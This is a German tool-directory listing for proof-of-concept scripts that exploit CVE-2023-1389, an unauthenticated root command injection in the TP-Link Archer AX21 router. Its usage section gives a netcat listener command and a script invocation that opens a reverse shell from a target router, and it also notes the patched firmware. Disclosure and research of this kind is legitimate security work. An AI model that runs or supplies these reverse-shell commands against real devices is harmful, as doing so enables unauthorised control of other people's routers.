Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-1389 — Proof-of-Concept-Skripte für CVE-2023-1389, eine nicht authentifizierte Befehlsinjektion in TP-Link Archer AX21, die Dateiübertragungs- und Reverse-Shell-Funktionen bereitstellt. | Kitploit
Tools/GitHubGitHub/voyag3r-security/cve-2023-1389
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

Proof-of-Concept-Skripte für CVE-2023-1389, eine nicht authentifizierte Befehlsinjektion in TP-Link Archer AX21, die Dateiübertragungs- und Reverse-Shell-Funktionen bereitstellt.

Repository anzeigen
1774vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

CVE-2023–1389 ist eine nicht authentifizierte Befehlsinjizierungsschwachstelle im TP-Link Archer AX21 WLAN-Router. Ein Callback im Parameter country verwendet die Funktion popen(), die als root ausgeführt wird, sodass der Angreifer beliebige Werte über GET- oder POST-Anfragen an die Admin-Oberfläche injizieren kann, ohne dass eine Authentifizierung erforderlich ist. Weitere Details zur Schwachstelle finden Sie hier.

Dies sind ein paar Proof-of-Concepts, die ich bei der Untersuchung der Befehlsinjektion erstellt habe. Archer-file-transfer.py war die erste Iteration und ist ziemlich umständlich in der Art und Weise, wie sie die Interaktion erreicht. Archer-rev-shell.py gibt Ihnen eine einfache Netcat-Reverse-Shell und ist wahrscheinlich die, nach der Sie suchen. Wenn Sie mehr über die Entwicklung dieser Skripte erfahren möchten, können Sie den Beitrag hier lesen.

Verwendung

In einem Terminalfenster:

root@kitploit:~
nc your_IP listener_port

In einem zweiten Terminalfenster:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

Behebung

TP-Link hat die Firmware-Version 1.1.4 Build 20230219 veröffentlicht, die das Problem durch Entfernen des anfälligen Callbacks behebt. Ein Update Ihres Routers auf die neueste Firmware sollte Ihr Gerät schützen.

Zukunft

Ich werde diese PoCs wahrscheinlich nicht weiter pflegen. Beide sind recht einfach und sollten bei Bedarf leicht modifiziert werden können.

Tool herunterladen